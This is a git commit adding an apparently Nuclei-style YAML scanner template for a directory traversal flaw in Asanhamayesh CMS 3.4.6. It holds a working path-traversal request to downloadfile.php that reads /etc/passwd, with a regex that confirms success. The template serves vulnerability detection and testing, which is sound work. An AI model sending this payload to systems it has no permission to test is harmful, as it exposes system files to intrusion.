Create asanhamayesh-cms-lfi.yaml
parent
fbf0b448be
commit
d4e38b00e3
|
@ -0,0 +1,24 @@
|
||||||
|
id: asanhamayesh-cms-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
|
||||||
|
author: 0x_Akoko
|
||||||
|
severity: high
|
||||||
|
reference: https://cxsecurity.com/issue/WLB-2018030006
|
||||||
|
tags: asanhamayesh,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue